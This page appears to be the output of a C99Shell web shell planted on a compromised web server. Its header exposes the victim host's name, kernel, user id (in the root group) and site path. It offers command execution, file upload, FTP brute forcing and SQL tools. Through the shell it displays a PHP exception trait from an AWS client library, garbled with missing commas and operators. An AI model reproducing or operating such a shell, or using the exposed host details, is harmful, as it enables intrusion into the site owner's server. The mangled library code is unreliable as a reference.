!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picomail.picotech.app/public_html/vendor/async-aws/core/src/Exception/Http/   drwxr-xr-x
Free 28.7 GB of 117.98 GB (24.32%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     HttpExceptionTrait.php (1.82 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace AsyncAws\Core\Exception\Http;

use 
AsyncAws\Core\AwsError\AwsError;
use 
Symfony\Contracts\HttpClient\ResponseInterface;

/**
 * @author Nicolas Grekas <p@tchwork.com>
 * @author Tobias Nyholm <tobias.nyholm@gmail.com>
 * @author Jérémy Derussé <jeremy@derusse.com>
 *
 * @internal
 */
trait HttpExceptionTrait
{
    
/**
     * @var ResponseInterface
     */
    
private $response;

    
/**
     * @var ?AwsError
     */
    
private $awsError;

    public function 
__construct(ResponseInterface $responseAwsError $awsError null)
    {
        
$this->response $response;
        
/** @var int $code */
        
$code $response->getInfo('http_code');
        
/** @var string $url */
        
$url $response->getInfo('url');

        
$message sprintf('HTTP %d returned for "%s".'$code$url);
        if (
null !== $this->awsError $awsError) {
            
$message .= <<<TEXT


Code:    
{$this->awsError->getCode()}
Message: 
{$this->awsError->getMessage()}
Type:    
{$this->awsError->getType()}
Detail:  
{$this->awsError->getDetail()}

TEXT;
        }

        
parent::__construct($message$code);

        
$this->populateResult($response);
    }

    public function 
getResponse(): ResponseInterface
    
{
        return 
$this->response;
    }

    public function 
getAwsCode(): ?string
    
{
        return 
$this->awsError $this->awsError->getCode() : null;
    }

    public function 
getAwsType(): ?string
    
{
        return 
$this->awsError $this->awsError->getType() : null;
    }

    public function 
getAwsMessage(): ?string
    
{
        return 
$this->awsError $this->awsError->getMessage() : null;
    }

    public function 
getAwsDetail(): ?string
    
{
        return 
$this->awsError $this->awsError->getDetail() : null;
    }

    protected function 
populateResult(ResponseInterface $response): void
    
{
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--